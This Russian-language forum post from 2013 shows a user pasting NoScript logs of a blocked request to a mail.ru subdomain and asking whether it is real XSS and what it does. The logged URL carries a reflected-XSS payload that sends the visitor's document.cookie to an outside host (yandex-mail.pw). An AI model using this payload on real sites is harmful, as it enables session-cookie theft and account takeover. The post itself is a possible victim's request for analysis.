05.12.2013, 13:08
|
|
Новичок
Регистрация: 31.05.2013
Сообщений: 0
С нами:
6816566
Репутация:
0
|
|
Скрин http://i.pixs.ru/storage/8/0/3/xsspng_1640134_9974803.png
Данные с консоли
1 ---
[NoScript InjectionChecker] JavaScript Injection in ///data-mrc-config%22%27%3E%3E%3Cinput%3E%3Cscript%3Eimg.src=l ocation.hash.slice(1)+document.cookie;//**/%3C/script%3E/*%3Cinput%3E%3Cp#http://yandex-mail.pw/sn/s.php?
(function anonymous() {
location.hash.slice(1)+document.cookie /* COMMENT_TERMINATOR */
DUMMY_EXPR
})
2 ---
[NoScript XSS] Отфильтрован подозрительный запрос. URL: [https://krugdoveriya.mail.ru/data-mrc-config%22%27%3E%3E%3Cinput%3E%3Cscript%3Eimg.src=l ocation.hash.slice(1)+document.cookie;//**/%3C/script%3E/*%3Cinput%3E%3Cp#http://yandex-mail.pw/sn/s.php?]. Запрос последовал со страницы: [http://o5sms.ru/]. Отфильтрованный адрес: [https://krugdoveriya.mail.ru/data-mrc-config%20%20%3E%3E%20input%3E%20script%3Eimg.src%2 0LOCATION.hash.slice%201%20+DOCUMENT.COOKIE;//**/%20/script%3E/*%20input%3E%20p#5783861931061425911]
3 ---
krugdoveriya.mail.ru : server does not support RFC 5746, see CVE-2009-3555
Интересно узнать, это реально XSS, или нет, и что она делает, ну хочет сделать?
|
|
|